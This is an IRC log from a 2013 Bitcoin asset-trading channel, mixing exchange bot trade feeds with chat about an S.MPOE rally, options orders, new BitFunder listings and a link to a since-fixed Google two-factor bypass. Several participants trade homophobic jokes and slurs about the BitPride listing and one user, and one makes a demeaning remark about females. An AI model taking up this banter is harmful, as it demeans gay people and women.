[S.MPOE] 14900 @ 0.00077019 = 11.4758 BTC [+] Feb 25 19:40:29 [MPEX] [S.MPOE] 2700 @ 0.00077019 = 2.0795 BTC [+] Feb 25 19:40:31 [MPEX] [S.MPOE] 4305 @ 0.0007702 = 3.3157 BTC [+] Feb 25 19:41:04 this mpoe rally is... a bit unnerving. Is there any of the investors? Feb 25 19:45:03 [MPEX] [S.MPOE] 2193 @ 0.0007702 = 1.689 BTC [+] Feb 25 19:45:05 [MPEX] [S.MPOE] 7407 @ 0.00077045 = 5.7067 BTC [+] Feb 25 19:46:51 jurov: it looks like more money has gone into MPEX than has gone out Feb 25 19:46:56 but a lot has gone in recently... Feb 25 19:47:41 [MPEX] [S.MPOE] 11200 @ 0.00077045 = 8.629 BTC [+] Feb 25 19:49:03 [MPEX] [S.MPOE] 11431 @ 0.0007672 = 8.7699 BTC [-] Feb 25 19:49:18 [MPEX] [S.MPOE] 4819 @ 0.00076336 = 3.6786 BTC [-] Feb 25 19:52:11 How high will it go? Feb 25 19:52:28 Looks like a big investor made a big buy, and then the bots took over. Feb 25 19:52:42 with no overhead resistance, how high will it go??? Feb 25 19:53:05 LOL Feb 25 19:53:07 I know right Feb 25 19:53:10 I'm sure MP will put a new ceiling with another share block for sale within a month or two. Feb 25 19:53:25 Is that the only way to keep the bots from making a bubble? Feb 25 19:53:28 putting up a wall? Feb 25 19:53:29 i KNEW loading up at .00062 was a good idea... Feb 25 19:54:11 I don't know how to control the bots. Sometimes I think they react to large bid or ask walls, but I could be just inferring signal from noise. Feb 25 19:55:03 "inferring signal from noise" < hmmmm Feb 25 19:55:10 That's been said to me before by a very smart person. Feb 25 19:55:34 [MPEX] [S.MPOE] 730 @ 0.00076627 = 0.5594 BTC [+] Feb 25 19:55:46 Nate Silver? Feb 25 19:55:57 hmm Feb 25 19:56:01 ... Feb 25 19:56:07 I like you Bugpowder Feb 25 19:56:24 awwww Feb 25 19:56:30 <3 Feb 25 20:00:00 [MPEX] [S.MPOE] 17154 @ 0.00076627 = 13.1446 BTC [+] Feb 25 20:01:00 [MPEX] [S.MPOE] 3350 @ 0.00076816 = 2.5733 BTC [+] Feb 25 20:01:02 [MPEX] [S.MPOE] 3043 @ 0.00077045 = 2.3445 BTC [+] Feb 25 20:01:04 [MPEX] [S.MPOE] 5688 @ 0.00077096 = 4.3852 BTC [+] Feb 25 20:01:53 https://blog.duosecurity.com/2013/02/bypassing-googles-two-factor-authentication/ Feb 25 20:16:43 [MPEX] [S.MPOE] 16450 @ 0.00077096 = 12.6823 BTC [+] Feb 25 20:17:18 :( Feb 25 20:18:02 is that somehting goog can easily fix? Feb 25 20:18:36 its fixed Feb 25 20:18:43 see bottom of page Feb 25 20:19:02 ah i see now Feb 25 20:22:38 [MPEX] [S.MPOE] 15050 @ 0.00077096 = 11.6029 BTC [+] Feb 25 20:32:54 [MPEX] [S.MPOE] 24410 @ 0.00077096 = 18.8191 BTC [+] Feb 25 20:36:00 [MPEX] [S.MPOE] 1800 @ 0.00076888 = 1.384 BTC [-] Feb 25 20:36:51 !topic Feb 25 20:40:28 [MPEX] [S.MPOE] 11100 @ 0.00076889 = 8.5347 BTC [+] Feb 25 20:44:35 [BTCTC] [GSDPT] 8 @ 0.00599 = 0.0479 BTC [-] Feb 25 20:48:42 [BTCTC] [S.MPOE-PT] 13 @ 0.00072 = 0.0094 BTC [+] Feb 25 20:48:44 [BTCTC] [S.MPOE-PT] 200 @ 0.00072 = 0.144 BTC [+] Feb 25 20:48:46 [BTCTC] [S.MPOE-PT] 50 @ 0.00073 = 0.0365 BTC [+] Feb 25 20:48:48 [BTCTC] [S.MPOE-PT] 1000 @ 0.00073 = 0.73 BTC [+] Feb 25 20:48:50 [BTCTC] [S.MPOE-PT] 20 @ 0.00074 = 0.0148 BTC [+] Feb 25 20:48:51 [BTCTC] [S.MPOE-PT] 4162 @ 0.00074 = 3.0799 BTC [+] Feb 25 20:51:08 [MPEX] [S.MPOE] 52 @ 0.00077096 = 0.0401 BTC [+] Feb 25 20:51:12 [MPEX] [S.MPOE] 4048 @ 0.0007721 = 3.1255 BTC [+] Feb 25 20:54:52 [MPEX] [S.MPOE] 5400 @ 0.00076889 = 4.152 BTC [-] Feb 25 21:02:46 jurov: you were not considering profits from options exercised Feb 25 21:03:57 and were there so many calls sold? Feb 25 21:05:14 MPOE feb report says: contracts exercised : 694.53906764 BTC Feb 25 21:05:33 it could be someone collecting over time Feb 25 21:05:48 what we have seen with s.mpoe need 10x as much Feb 25 21:05:59 do withdrawals come from Feb 25 21:06:08 the same address as deposits? Feb 25 21:06:33 often yes Feb 25 21:07:05 ill make a datagraph of cashflow going into mpex Feb 25 21:07:43 http://blockchain.info/charts/balance?address=1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx Feb 25 21:08:12 does that take into account cold storage? Feb 25 21:08:57 seems unlikely given the amount in the wallet in Nov Feb 25 21:10:46 [MPEX] [S.MPOE] 1100 @ 0.00076889 = 0.8458 BTC [-] Feb 25 21:10:48 [MPEX] [S.MPOE] 3250 @ 0.00076888 = 2.4989 BTC [-] Feb 25 21:11:02 [MPEX] [S.MPOE] 1446 @ 0.00076738 = 1.1096 BTC [-] Feb 25 21:11:04 [MPEX] [S.MPOE] 304 @ 0.00076336 = 0.2321 BTC [-] Feb 25 21:12:16 [BTCTC] [S.BBET-PT] 10 @ 0.0022 = 0.022 BTC [+] Feb 25 21:12:23 [MPEX] [S.MPOE] 13552 @ 0.0007721 = 10.4635 BTC [+] Feb 25 21:12:31 [MPEX] [S.MPOE] 24700 @ 0.00077211 = 19.0711 BTC [+] Feb 25 21:12:33 [MPEX] [S.MPOE] 11654 @ 0.00077218 = 8.999 BTC [+] Feb 25 21:12:44 [MPEX] [S.MPOE] 16450 @ 0.00077464 = 12.7428 BTC [+] Feb 25 21:12:46 [MPEX] [S.MPOE] 2444 @ 0.00077505 = 1.8942 BTC [+] Feb 25 21:17:26 [MPEX] [S.MPOE] 10856 @ 0.00077505 = 8.4139 BTC [+] Feb 25 21:17:28 [MPEX] [S.MPOE] 4444 @ 0.00077574 = 3.4474 BTC [+] Feb 25 21:19:14 ;;ticker Feb 25 21:19:15 BTCUSD ticker | Best bid: 30.36501, Best ask: 30.39000, Bid-ask spread: 0.02499, Last trade: 30.36501, 24 hour volume: 29335.04571180, 24 hour low: 29.20123, 24 hour high: 30.39000, 24 hour vwap: 29.95731 Feb 25 21:19:43 ;;asks 31 Feb 25 21:19:44 There are currently 6502.7346 bitcoins offered at or under 31.0 USD, worth 199960.733222 USD in total. Feb 25 21:19:51 ;;bids 29 Feb 25 21:19:51 ;;asks 31.92 Feb 25 21:19:53 There are currently 8486.0226 bitcoins demanded at or over 29.0 USD, worth 249122.523027 USD in total. Feb 25 21:19:54 There are currently 13672.915 bitcoins offered at or under 31.92 USD, worth 425740.422215 USD in total. Feb 25 21:20:05 oh my... S.MPOE on a tear again Feb 25 21:24:04 [MPEX] [S.MPOE] 15 @ 0.00076336 = 0.0115 BTC [-] Feb 25 21:32:33 [BTCTC] [GSDPT] 5 @ 0.00599 = 0.03 BTC [-] Feb 25 21:33:06 [BTCTC] [S.DICE-PT] 10 @ 0.0062 = 0.062 BTC [-] Feb 25 21:33:32 [BTCTC] [BASIC-MINING] 1 @ 0.3499 BTC [-] Feb 25 21:36:17 neat Feb 25 21:37:35 [MPEX] [S.MPOE] 8434 @ 0.00076673 = 6.4666 BTC [+] Feb 25 21:43:18 New asset launched on BitFunder. https://bitfunder.com/asset/BitPride Feb 25 21:43:22 Already 10% of shares sold Feb 25 21:44:28 sounds pretty gay Feb 25 21:44:36 what is bitpride? Feb 25 21:45:19 I assume its some kind of bitcoin for homosexuals thing Feb 25 21:46:12 lol Feb 25 21:46:18 they sell shirts and other stuff Feb 25 21:46:22 70% profits Feb 25 21:46:29 bitcoin shirts, etc Feb 25 21:46:39 with rainbows on em Feb 25 21:46:49 .. you knocking the rainbows and unicorns? :P Feb 25 21:46:58 http://bitcoinpride.com/ Feb 25 21:47:07 what will they do with the IPO coins? Feb 25 21:47:08 terrible designs Feb 25 21:47:27 this smells of MNW Feb 25 21:47:42 MNW? Feb 25 21:48:03 [MPEX] [S.DICE] 2000 @ 0.00619999 = 12.4 BTC [-] Feb 25 21:48:10 [MPEX] [S.DICE] 1878 @ 0.0062 = 11.6436 BTC [+] Feb 25 21:48:13 [MPEX] [S.DICE] 1122 @ 0.00624656 = 7.0086 BTC [+] Feb 25 21:48:17 http://www.zerohedge.com/news/2013-02-25/japan-matrix-now-reality-humans-are-used-living-batteries Feb 25 21:48:18 le lol. Feb 25 21:48:26 he said fudns will be used for stock production of newer items, mousepads, mugs, etc Feb 25 21:48:49 [HAVELOCK] [SDICE] 2 @ 0.64 = 1.28 BTC [+] Feb 25 21:48:51 [HAVELOCK] [SDICE] 48 @ 0.63 = 30.24 BTC [-] Feb 25 21:49:00 I assume its some kind of bitcoin for homosexuals thing lmao Feb 25 21:49:24 already have gay colored coins Feb 25 21:50:11 jurov: for what? Feb 25 21:50:19 posting pictures of africans Feb 25 21:50:21 or some crap ? Feb 25 21:50:27 yes Feb 25 21:50:30 [MPEX] [S.MPOE] 4900 @ 0.00077428 = 3.794 BTC [+] Feb 25 21:50:34 [MPEX] [S.MPOE] 4931 @ 0.00077574 = 3.8252 BTC [+] Feb 25 21:50:36 [MPEX] [S.MPOE] 2369 @ 0.00077684 = 1.8403 BTC [+] Feb 25 21:51:00 http://bitcoin.stackexchange.com/questions/5695/what-are-colored-coins Feb 25 21:51:28 basically, they will put all of us out of business ;) Feb 25 21:52:11 mircea_popescu: the word pride has been universally aquired by the GLBT community Feb 25 21:52:38 dub they wish. a lion's pride is still a buncha slave chicks Feb 25 21:52:42 doing the dishes and whatnot Feb 25 21:53:15 maybe in Romanistani BDSM vernacular, elsewhere its a bunch of homo cats Feb 25 21:53:39 nohomo Feb 25 21:53:56 "A pride of lions consists of related females and offspring and a small number of adult males." Feb 25 21:54:00 lmao @retardopedia. Feb 25 21:54:11 srsly. a pride of lions consists of a lion and his owned females + offspring. Feb 25 21:54:18 wtf is this restating reality in libertard terms. Feb 25 21:54:29 free shipping on orders over $100, because im goign to buy 140 bitcoin t-shirts Feb 25 21:54:48 dub well if you buy for the whole pride... Feb 25 21:55:38 72 cents for a shirt? Feb 25 21:55:49 .7 euro Feb 25 21:56:20 Mp, I want to sell covered calls- at $31 strike and a ceratin price- can you tell me properly format. Thank you Feb 25 21:56:24 or is that bitcoins Feb 25 21:56:32 obv Feb 25 21:56:50 jborkl: that would be providing customer service Feb 25 21:57:00 jborkl, read faq and then ask concretely Feb 25 21:57:16 or use coinbr. we can do it for you Feb 25 21:57:47 The MKOPT command does not state price as a option Feb 25 21:57:52 in the faq Feb 25 21:58:09 jborkl SELL|O.BTCUSD310T|10|100 sells 10 at 100 satoshi each. Feb 25 21:58:18 bah Feb 25 21:58:19 Thank you mp Feb 25 21:58:24 jborkl cause collateral is determined by mpex Feb 25 21:58:24 SELL|O.BTCUSD.C310T|10|100 Feb 25 21:58:57 wait. mkopt doesn't state price ?! what ? Feb 25 21:59:37 I was not sure if it was - sell - like regular options or mkopt Feb 25 21:59:49 sell to open and buy to close Feb 25 21:59:58 like nasdaq or nyse Feb 25 22:00:00 [BTCTC] [GSDPT] 11 @ 0.00599 = 0.0659 BTC [-] Feb 25 22:00:01 mkopt/split accepts whole sum, user has to compute himself how many puts/calls will be done Feb 25 22:00:02 it is the same Feb 25 22:00:19 [MPEX] [S.MPOE] 12150 @ 0.00077307 = 9.3928 BTC [-] Feb 25 22:00:22 jborkl sell sells. mkopt creates them but does't sell Feb 25 22:00:24 *done->created Feb 25 22:02:22 lol, mpex interface is YKWYD Feb 25 22:02:23 You Know What You Did Feb 25 22:03:23 lol Feb 25 22:03:29 http://tvtropes.org/pmwiki/pmwiki.php/Main/YouKnowWhatYouDid Feb 25 22:03:33 true anonimity! Feb 25 22:04:00 a YTMND interface would be better Feb 25 22:04:09 nocosby. Feb 25 22:04:28 I understand, thanks for the explanation Feb 25 22:05:27 jurov your evil plan to have me lost in tvtropes for the rest of the night fails Feb 25 22:05:31 mircea_popescu: haha http://moonpissedrap.ytmnd.com/ Feb 25 22:05:31 i just forwarded the link. Feb 25 22:05:57 forwarded to where? to punish the girl? Feb 25 22:06:16 [MPEX] [S.MPOE] 12250 @ 0.00077312 = 9.4707 BTC [+] Feb 25 22:06:17 [MPEX] [S.MPOE] 1404 @ 0.00077684 = 1.0907 BTC [+] Feb 25 22:06:42 yeah, to an unfortunate victim. Feb 25 22:07:55 [MPEX] [S.MPOE] 650 @ 0.00077307 = 0.5025 BTC [-] Feb 25 22:07:57 [MPEX] [S.MPOE] 3716 @ 0.00076673 = 2.8492 BTC [-] Feb 25 22:08:01 mircea_popescu: i borrowed your bond system for raising capital Feb 25 22:08:03 [MPEX] [S.MPOE] 11684 @ 0.00076336 = 8.9191 BTC [-] Feb 25 22:08:06 very effective.... Feb 25 22:08:23 [MPEX] [S.DICE] 2600 @ 0.0061727 = 16.049 BTC [-] Feb 25 22:08:30 [MPEX] [S.DICE] 2000 @ 0.00624655 = 12.4931 BTC [+] Feb 25 22:08:31 [MPEX] [S.DICE] 400 @ 0.00624656 = 2.4986 BTC [+] Feb 25 22:08:40 thestringpuller, where? Feb 25 22:08:48 [HAVELOCK] [SDICE] 2 @ 0.631 = 1.262 BTC [+] Feb 25 22:08:50 [HAVELOCK] [SDICE] 48 @ 0.63 = 30.24 BTC [-] Feb 25 22:09:01 used it on your kids? Feb 25 22:09:21 no. for a project of mine Feb 25 22:09:27 promoting a concert Feb 25 22:09:47 lol mpex leaks into rl./ Feb 25 22:10:28 mircea_popescu: waiting for a deposit to be credited... 40 confirmations now.. can you click your magic button please? Feb 25 22:11:48 [MPEX] [S.MPOE] 4282 @ 0.00077684 = 3.3264 BTC [+] Feb 25 22:11:50 [MPEX] [S.MPOE] 13068 @ 0.0007774 = 10.1591 BTC [+] Feb 25 22:12:02 no magic button... mircea has to open the safe behind 5 armored doors protected by DNA analyzer where the paper wallet is Feb 25 22:12:06 all magic buttons clicked. Feb 25 22:12:59 http://struttingavenger.ytmnd.com/ Feb 25 22:13:03 oh noes.. i'm chitchatting here and have waiting deposits too.... Feb 25 22:13:11 midnightmagic: thank you! Feb 25 22:13:17 [MPEX] [S.DICE] 1978 @ 0.00624656 = 12.3557 BTC [+] Feb 25 22:13:34 lol Feb 25 22:13:45 FINE! next time go to midnightmagic to halp. Feb 25 22:13:55 this is thanks scamming Feb 25 22:14:06 [MPEX] [S.DICE] 505 @ 0.0063798 = 3.2218 BTC [+] Feb 25 22:14:18 [MPEX] [S.DICE] 2000 @ 0.0063798 = 12.7596 BTC [+] Feb 25 22:14:20 [MPEX] [S.DICE] 500 @ 0.00637989 = 3.1899 BTC [+] Feb 25 22:14:24 [MPEX] [S.DICE] 470 @ 0.00637989 = 2.9985 BTC [+] Feb 25 22:14:27 [MPEX] [S.DICE] 26525 @ 0.0063799 = 169.2268 BTC [+] Feb 25 22:14:28 bitcointalk explained http://discordponies.ytmnd.com/ Feb 25 22:14:29 [MPEX] [S.MPOE] 5700 @ 0.0007774 = 4.4312 BTC [+] Feb 25 22:16:03 [MPEX] [S.MPOE] 21093 @ 0.0007774 = 16.3977 BTC [+] Feb 25 22:17:58 remembering why ytmnd is bad, too many lols not enough time Feb 25 22:18:01 last one http://mashedpotatostyle.ytmnd.com/ Feb 25 22:20:59 mircea_popescu !! Feb 25 22:21:04 i pmed you, did you get my message. Feb 25 22:21:05 ? Feb 25 22:21:12 dont say it wasnt appropriately formatted Feb 25 22:21:15 yea, it was some vague self centered crap. Feb 25 22:21:23 let me pm you again. Feb 25 22:21:23 and so it got discarded. Feb 25 22:21:30 this time i will format is more srs Feb 25 22:21:40 kay. try to phrase it so that it makes sense to someone who's not inside your head. Feb 25 22:22:40 i tried atleast now :I Feb 25 22:25:33 [MPEX] [S.MPOE] 13159 @ 0.00076881 = 10.1168 BTC [-] Feb 25 22:25:37 lol damn tab button Feb 25 22:26:00 mircea_popescu: thanks :) Feb 25 22:26:25 :p Feb 25 22:26:55 13 million shares of s.dice trading on mpex right? Feb 25 22:27:19 http://bitbet.us/bet/261/bfl-will-deliver-asic-devices-before-march-15th/ Feb 25 22:27:22 =) Feb 25 22:27:24 wanna bet? Feb 25 22:27:57 havelock now has 8% of the 13m -- my goal was 10% by end of feb.. which we would have passed if erik didnt release those 3m extra shares! Feb 25 22:28:55 topace as long as there's buying pressure should be doable. Feb 25 22:29:17 but u didn't buy any shares Feb 25 22:29:20 just now Feb 25 22:29:48 i didnt? Feb 25 22:30:09 S.DICE x 1`040`000 Feb 25 22:30:32 [MPEX] [S.MPOE] 11900 @ 0.00076436 = 9.0959 BTC [-] Feb 25 22:30:42 no u didn't Feb 25 22:31:03 someone bought 5k just before he sold 5k above neh ? Feb 25 22:31:20 jurov: sorry for the delay merging your commits, been away :p Feb 25 22:31:23 [MPEX] [O.BTCUSD.P390T] 750 @ 0.53093481 = 398.2011 BTC Feb 25 22:31:50 by away I mean "spending every waking hour at #GEEK2013" :P Feb 25 22:34:16 Azelphur, as long as it's done before March 10, it's OK Feb 25 22:34:17 [MPEX] [S.MPOE] 1278 @ 0.00076336 = 0.9756 BTC [-] Feb 25 22:34:18 [MPEX] [S.MPOE] 9622 @ 0.00076164 = 7.3285 BTC [-] Feb 25 22:34:24 yea, it's already merged :) Feb 25 22:35:30 my life over the weekend has basically been wake up, go to geek 2013 at 10am, leave at 5pm while they switch into over 18s mode and get a takeout, back in at 6pm, out at 11pm, sleep, repeat Feb 25 22:35:30 xD Feb 25 22:35:52 [MPEX] [S.MPOE] 4600 @ 0.00076164 = 3.5035 BTC [-] Feb 25 22:37:22 havbing fun ? Feb 25 22:37:33 mircea_popescu: hell yes xD Feb 25 22:37:53 mircea_popescu: https://www.dropbox.com/sh/aweozfzwfr2qwqo/5PWdlBFFrO#f:2013-02-23%2011.28.41.jpg every screen is a console, literally thousands of games, more off camera Feb 25 22:38:00 everything from binatones to xboxes. Feb 25 22:38:04 cool Feb 25 22:38:12 6 minutes walk from my house Feb 25 22:38:13 :D Feb 25 22:41:38 its a LAN for console gamers? Feb 25 22:42:08 dub: it's a retro gaming event, so they have lots of old stuff, no LAN but plenty of multiplayer going on Feb 25 22:42:11 [MPEX] [S.MPOE] 1778 @ 0.00076164 = 1.3542 BTC [-] Feb 25 22:42:12 [MPEX] [S.MPOE] 2422 @ 0.00076118 = 1.8436 BTC [-] Feb 25 22:43:20 dub: I spent most of the time playing games like goldeneye (n64), powerstone (dc), mario kart 64, etc Feb 25 22:43:47 got to play on an OUYA and meet with a dev, too Feb 25 22:44:20 did you play any Quake? Feb 25 22:44:33 I'm not sure if quake was there Feb 25 22:44:53 not really a console game Feb 25 22:45:04 yea, it was mostly about consoles Feb 25 22:45:10 I'm more of a PC gamer myself, but it was still very fun Feb 25 22:45:26 console nerds are wierd Feb 25 22:45:29 did you ask them to accept your bitcoins as payment? Feb 25 22:45:41 I've got a buddy with like two of every console ever made Feb 25 22:45:47 DeadWeasel: nope haha Feb 25 22:47:03 [MPEX] [S.MPOE] 3634 @ 0.00076436 = 2.7777 BTC [+] Feb 25 22:47:05 [MPEX] [S.MPOE] 666 @ 0.00077362 = 0.5152 BTC [+] Feb 25 22:47:52 [BTCTC] [RSM] 3 @ 0.0095 = 0.0285 BTC [+] Feb 25 22:48:23 [BTCTC] [GSDPT] 5 @ 0.00599 = 0.03 BTC [-] Feb 25 22:50:23 hey sgornick , another asset launched. https://bitfunder.com/asset/BitPride I think you know the owner. lol Feb 25 22:50:34 or at least you should :P Feb 25 22:56:03 [BTCTC] [S.MPOE-PT] 3 @ 0.00075 = 0.0023 BTC [+] Feb 25 22:57:17 his wife is gay? Feb 25 23:01:31 pigeons its OK if you're gay. We don't judge here. The internet is for all. Feb 25 23:02:19 i agree Feb 25 23:04:16 aethero is ziggap still your thing Feb 25 23:04:30 I'm on the team Feb 25 23:04:35 why Feb 25 23:04:37 pigeons is not gay Feb 25 23:04:43 i thought it was Feb 25 23:04:48 he just has a single hole for all jobs. Feb 25 23:04:50 jcpham: +1 ziggap :) Feb 25 23:04:57 i read a press release and saw the florida address Feb 25 23:05:04 i didn't realize there was a team Feb 25 23:05:06 Thats just the mailin gaddress. Feb 25 23:05:13 and thought it was you and the lady-chef Feb 25 23:05:20 i understand Feb 25 23:05:35 Its me, the lady-chef, a developer, and more Feb 25 23:05:44 super. good for you guys Feb 25 23:05:57 lemme know if you need local help Feb 25 23:06:00 i work for bacon Feb 25 23:06:06 Hmm... new stuff on bitfunder Feb 25 23:06:16 jcpham Got a dryer to sell? lol Feb 25 23:06:18 And deliver? Feb 25 23:06:27 Ukto: Thanks. I'm flummoxed that nowhere is there an "Inc.", "LLC", "Ltd", etc., in the profiles of listings. Feb 25 23:06:27 clothes dryer? Feb 25 23:06:31 Yes Feb 25 23:06:36 Ours burned out this morning Feb 25 23:06:43 That's two IPOs in two days where in the U.S., crowdfunding equity was raised from the public. The SEC still hasn't published its rules or this would be more common. (Still wouldn't be done the same way from them, ..., i.e., couldn't buy shares anonymously but there would be a path for an entrepreneur to put a company out there.) Feb 25 23:07:06 i did but I have family in college Feb 25 23:07:06 G.MPOE relatively cheap still... Feb 25 23:07:09 they took it i think Feb 25 23:07:21 sgornick: these are not IPO, these are profit lease... Feb 25 23:07:48 gaypride assets on buttfunder amirite Feb 25 23:08:24 apparently it's perfectly legal to sell rights to profits as long as it's not ownership in the company. Feb 25 23:08:26 There is a ZigGap LLC, on their site but the Asset listing doesn't use that,so not sure what I'ld own. Feb 25 23:08:47 BitPride isn't even an LLC or whatever, I have no idea what I'ld own if I held a share. Feb 25 23:08:51 Apparently... Feb 25 23:08:54 ooh i can buy ziggap Feb 25 23:08:59 where Feb 25 23:09:01 You're not buying ziggap. Feb 25 23:09:01 sgornick: neither one are selling ownership of the companies Feb 25 23:09:05 jcpham : pm Feb 25 23:09:21 sgornick, even if you bought ziggap you wouldn't parts of ziggap LLC Feb 25 23:09:36 only the profits are sold Feb 25 23:09:53 both ziggap and bitpride are only selling rights to profits, not actual ownership of the businesses Feb 25 23:10:02 wait bitpride.... Feb 25 23:10:04 wth is that Feb 25 23:10:08 Namworld: I see. That isn't clear from the profile. A rational person might think otherwise from viewing the site. Feb 25 23:10:12 jcpham: T shirts. Feb 25 23:10:24 jcpham: it's the bitsexuals' movement Feb 25 23:10:26 with rainbows Feb 25 23:10:30 jcpham likes to zigegape his buttpride Feb 25 23:10:33 not that theyres anything wrong wit hit Feb 25 23:10:36 Shares of ZigGap Feb 25 23:10:36 ZigGap is comprised of 50,000,000 shares in total. Feb 25 23:10:36 1 share of ZigGap on BitFunder represents 1/50,000,000th of monthly profits after all costs. Feb 25 23:10:36 ZigGap shares offer no voting rights. Shares of ZigGap on BitFunder do not represent real world shares of the company. Feb 25 23:10:37 > Should the company be sold, the full amount of the purchase price will be evenly distributed amongst the 50,000,000 shares. Feb 25 23:10:40 It says it right in the description Feb 25 23:10:42 bitpride name needs to die Feb 25 23:10:46 ziggape* Feb 25 23:11:00 Why would I receive a fraction of purchase price without owning part of the company? Feb 25 23:11:08 sorry last time i bought shares it worked out horribly Feb 25 23:11:11 legal reasoning Feb 25 23:11:13 so i stopped Feb 25 23:12:05 is that legal reasoning, like find some vaguely related statue and assume it applies to you Feb 25 23:12:19 heh, dub. Feb 25 23:13:14 dub is our official angry asshole. He looked a bit depressed a few days ago but now he's back in business. Feb 25 23:13:44 wait where does that leave esk Feb 25 23:13:49 eskimobob Feb 25 23:14:17 http://www.thefrisky.com/2013-02-25/lil-poopy-is-a-9-year-old-rapper-who-slaps-adult-womans-ass-in-music-video/ Feb 25 23:14:21 Lil Poopy Feb 25 23:14:25 dead, pigeons Feb 25 23:14:34 it leaves eskimobob dead. Feb 25 23:14:37 I'd call Namworld the official stater of obviouslness but that would be dividing by zero Feb 25 23:14:41 he'll always be my official angry asshole Feb 25 23:15:24 theres angry asshole and theres psychotic foam spitting madman Feb 25 23:16:48 oh. Working to be promoted to the later? Feb 25 23:17:17 excuse me while I go back to mostly ignoring you Feb 25 23:18:14 [BTCTC] [MININGCO.ETF] 1 @ 0.58 BTC [-] Feb 25 23:21:32 ;;ticker Feb 25 23:21:32 BTCUSD ticker | Best bid: 30.30723, Best ask: 30.39999, Bid-ask spread: 0.09276, Last trade: 30.39999, 24 hour volume: 26301.19175573, 24 hour low: 29.35001, 24 hour high: 30.40000, 24 hour vwap: 30.03463 Feb 25 23:22:09 im in a webex with someone that should be the official worst presenter ever, flat monotone irish accent reading from a script too quietly, doesnt know how to drive powerpoint (clicking through preview slides) Feb 25 23:24:34 [BTCTC] [BASIC-MINING] 10 @ 0.3499 = 3.499 BTC [-] Feb 25 23:27:34 [BTCTC] [GSDPT] 3 @ 0.00599 = 0.018 BTC [-] Feb 25 23:27:37 [BTCTC] [BASIC-MINING] 4 @ 0.3499 = 1.3996 BTC [-] Feb 25 23:28:12 and parroting too much fucking ITILspeak Feb 25 23:28:47 !ticker m s.mpoe Feb 25 23:28:49 [MPEX:S.MPOE] 1D: 0.00061614 / 0.00071254 / 0.00078 (13271604 shares, 9,456.58 BTC), 7D: 0.00061614 / 0.00068091 / 0.00078 (23129522 shares, 15,749.21 BTC), 30D: 0.0006153 / 0.00067084 / 0.00078 (72587273 shares, 48,695.14 BTC) Feb 25 23:30:24 how's it goin today :] Feb 25 23:32:59 well apparently Feb 25 23:36:04 yeah! Feb 25 23:38:08 !ticker h sdice Feb 25 23:38:10 [HAVELOCK:SDICE] 1D: 0.62410000 / 0.64039738 / 0.69400000 (242 shares, 154.97616500 BTC), 7D: 0.60000000 / 0.66900467 / 0.75100000 (1451 shares, 970.72577407 BTC), 30D: 0.52100000 / 0.66633885 / 0.89000000 (10896 shares, 7260.42815402 BTC) Feb 25 23:41:02 [MPEX] [S.MPOE] 15950 @ 0.0007736 = 12.3389 BTC [-] Feb 25 23:41:22 [BTCTC] [GSDPT] 5 @ 0.00599 = 0.03 BTC [-] Feb 25 23:54:40 http://trilema.com/2013/permanently-elevated-plateau/ Feb 25 23:54:46 recomended reading for that last paragraph. Feb 26 00:00:54 [MPEX] [S.MPOE] 17677 @ 0.00077015 = 13.6139 BTC [-] Feb 26 00:00:56 [MPEX] [S.MPOE] 2812 @ 0.00077014 = 2.1656 BTC [-] Feb 26 00:02:16 so can someone explain what ziggap does Feb 26 00:02:30 Get endlessly trolled Feb 26 00:03:32 ziggap does direct bitcoin sales Feb 26 00:03:54 so its an exchange? Feb 26 00:04:33 or it cold calls you in the middle fo teh night/shows up at your door with a vacume cleaner Feb 26 00:04:35 it doesn't buy does it Feb 26 00:04:53 presumably its buying some fiat currency Feb 26 00:05:07 We're like fastcash4bitcoins except in reverse. Feb 26 00:05:16 Are they an exchange? Feb 26 00:05:19 I don't know what that is Feb 26 00:05:20 thx for the article mp, good stuff Feb 26 00:05:43 https://fastcash4bitcoins.com/about.aspx Feb 26 00:05:54 FastCash4Bitcoins is a service of Tangible Cryptography LLC. We are not an exchange; we are a direct buyer of bitcoins. In keeping with the bitcoin philosophy of limited third party trust we don't hold client's balances (bitcoins or dollars), instead we only accept a sale when we can promptly pay it Feb 26 00:05:58 We're the same. In reverse. Feb 26 00:06:06 We're not an exchange. We are a direct seller of Bitcoins. Feb 26 00:07:04 like he said, you buy fiat Feb 26 00:07:09 hehe Feb 26 00:07:42 sell btc/buy fiat, exchange fiat for btc, pay divs, right? Feb 26 00:08:26 mircea_popescu: good article. I like your analysis. Feb 26 00:10:09 wow... SP500 tanked Feb 26 00:11:31 SpNg ;) Feb 26 00:12:08 Bugpowder_ aww, quantitatively quantitative easing fizzled again ? Feb 26 00:13:18 mircea_popescu: i recently found your exchange and blog. It's been a good read. Just getting into BTC, but I like this S.DICE investment. I have been wanting to ask you, how does one purchase shares with your exchange? Feb 26 00:14:14 echo '|gpg --clearsign|gpg --encrypt --armor -r F1B69921 Feb 26 00:14:32 one does not simply walk into mpex Feb 26 00:15:10 http://mpex.co/faq.html#3 Feb 26 00:15:39 step 1 ) purchase a 6 pack of your favorite beer. Feb 26 00:16:16 ThickAsThieves: I see. That FAQ is what I have been looking for. Feb 26 00:17:13 cool cool Feb 26 00:18:00 if that's too geeky for you, shares are also sold through brokers on other exchanges Feb 26 00:18:26 but you give up 5% of your sdice dividends Feb 26 00:18:53 the exchanges are listed when you log into this channel Feb 26 00:18:54 <-- Software dev. loves the geeky stuff. Feb 26 00:18:59 word Feb 26 00:19:15 so it's 30 BTC fee + 5% of the dividend payout? Feb 26 00:19:30 no Feb 26 00:20:04 Bowjob: I just re read, I c Feb 26 00:24:41 SpNg well, you issue an order Feb 26 00:25:33 mircea_popescu: I was trying to figure out how to get an account. ThickAsThieves pointed me to the FAQ. Exactly what I was looking for. ;-) Feb 26 00:25:39 a cool! Feb 26 00:25:44 coinbr.com does NOT rob you of 5% of dividends ;) Feb 26 00:29:13 oh lovely, huffpoo has opinion pieces on cash now ?! Feb 26 00:29:34 what's next, i'm going to read theosophy on somethingbawful ? Feb 26 00:29:52 AUSTERITY COUNTDOWN: 4 DAYS TIL PAIN . Bitcoin users not affected. Feb 26 00:30:23 whats in 4 days? Feb 26 00:30:31 ;;asks 31 Feb 26 00:30:33 There are currently 7358.0245 bitcoins offered at or under 31.0 USD, worth 225943.062008 USD in total. Feb 26 00:30:34 S.DICE div Feb 26 00:30:35 ? Feb 26 00:30:36 ;;bids Feb 26 00:30:37 (bids [--under] ) -- Calculate the amount of bitcoin demanded at or over . If '--under' option is given, find coins or at or under . Feb 26 00:30:43 Bowjob, go to huff.to Feb 26 00:30:44 ;;bids 30 Feb 26 